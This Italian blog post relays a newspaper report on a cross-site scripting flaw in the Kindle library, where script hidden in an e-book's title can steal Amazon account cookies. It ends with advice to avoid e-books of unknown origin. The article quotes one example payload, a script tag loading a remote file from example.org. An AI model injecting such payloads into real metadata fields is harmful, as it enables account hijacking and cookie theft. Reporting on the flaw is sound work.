Kindle sotto attacco

attacco-a-kindle
17 Set

Kindle sotto attacco

Di 0 Commenti

Anche l’ innocente e culturale E.book.reader è sotto la lente d’ingrandimento degli Hacker, proprio stamattina mi è capitato di leggere un articolo su “il Fatto quotidiano” a firma del sempre ottimo Rapetto che riporto in parte e parlava proprio di questo problema tornato in auge in questi giorni:

Estratto Articolo de Il Fatto Quotidiano —

Proprio in questi giorni è riapparsa una minaccia che – scoperta nell’ottobre di un anno fa – molti credevano esser stata curata a dicembre e definitivamente archiviata. Il 16 settembre sarebbe stato individuato un nuovo specifico rimedio.

A lanciare l’allarme è un ricercatore particolarmente attivo, Benjamin Daniel Mussler, che non esita a spiegare che gli hacker possono ‘avvelenare’ i lettori Kindle utilizzando codici maligni o ‘script‘, nascosti ad esempio nel titolo di un e-book, andando a compromettere gravemente l’account Amazon del malcapitato di turno.

L’azione criminale va a colpire le funzioni di gestione dei contenuti e dei dispositivi e quelle di impostazione dell’apparato presenti nella libreria di Kindle. Una tanto impercettibile quanto venefica istruzione maligna come « <script src=”https://www.example.org/script.js”></script> » può essere mandata in esecuzione non appena l’utente apre la pagina web del Kindle Store: i cookies dell’account di Amazon possono essere raggiunti e trasferiti a chi ha progettato la trappola con conseguenze sgradevoli per chi si è inconsapevolmente fatto scippare la propria identità di bibliofilo digitale.

Mentre gli e-book “originali” sono considerati sicuri, quelli acquisiti da fonti non certificate (siti “birichini” o amici/colleghi pronti a condividere file di dubbia o ignota provenienza) possono essere sfruttati dai moderni manigoldi per andare a segno.

Mentre gli esperti sono al lavoro per verificare se il “fixing” (ovvero la riparazione della falla) è andato a buon fine, la raccomandazione è quella di non cadere nella tentazione di accaparrarsi libri elettronici di cui non si conosce l’origine o che si sa essere frutto di più o meno acrobatiche scorribande.

Twitter: @Umberto_Rapetto

Quindi signori miei, se siete felici possessori di uno di questi fantastici gingilli. trattateli con cura.

 

Fonti: il Fatto quotidiano – Umberto Rapetto

Condividi questo post

Autore

Internet & IT Worker | Privacy Expert | DPO | Marito & Padre | Arciere per passione.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.

Relativi post

21 Set

E hanno ribucato icloud ! Nuove polemiche sulla sicurezza di iCloud

E’ successo nuovamente: dopo poche settimane dall’attacco precedente e di foto senza veli rese pubbliche sul web, ci risiamo, le... leggi di più

The-Equation-Group
18 Feb

The Equation Group

Kaspersky ha scoperto un enorme “magazino” di malware utilizzato per infettare migliaia di computer in oltre 30 paesi. La... leggi di più

log recorder per PA e Aziende Sanitarie
06 Set

Anche PA e Strutture Sanitarie obbligate alla registrazione Access Log

E’ successo quello che era naturale e normale succedesse, anche PA e Strutture Sanitarie dovranno provvedere alla registrazione log.... leggi di più

09 Ott

Tyupkin, il malware per saccheggiare i Bancomat

I laboratori di Kaspersky Labs hanno condotto un’analisi forense relativa a un attacco contro diversi ATM situati nell’Europa dell’Est... leggi di più

DVR obbligatori
23 Set

I Corsi DVR obbligatori?

Una delle questioni meno chiare sugli obblighi derivanti per tutte le attività, anche quelle fino a 10 collaboratori dove... leggi di più

01 Mar

Cryptolocker ora colpisce direttamente i Server

I ricercatori di Kaspersky Lab hanno individuato ed analizzato una nuova variante di CTB-Locker, un cryptolocker che prende di mira... leggi di più

14 Gen

E voi vi preoccupate di #EYEPYRAMID !? Postacertificata.gov in “crash”

postacertificata.gov.it viene segnalato come non sicuro da Google Chrome e Firefox, da 14 gg La strana storia della Posta certificata.... leggi di più

drown attack
02 Mar

DROWN Attack

Fonte: https://drownattack.com/ Che dire, non si fa a tempo a parlar di una minaccia che a ruota ne arriva subito un’altra.... leggi di più

14 Set

Perché Apple Pay potrebbe battere le carte di credito

La scorsa settimana, Apple è stata al centro di una questione di rilevanza internazionale quando alcuni hacker hanno trovato... leggi di più

06 Set

D.lgs 81/08 obbligo per tutti

In applicazione alla norma che rende da gennaio 2013, con data ultima 31 maggio 2013 da apporsi con “data... leggi di più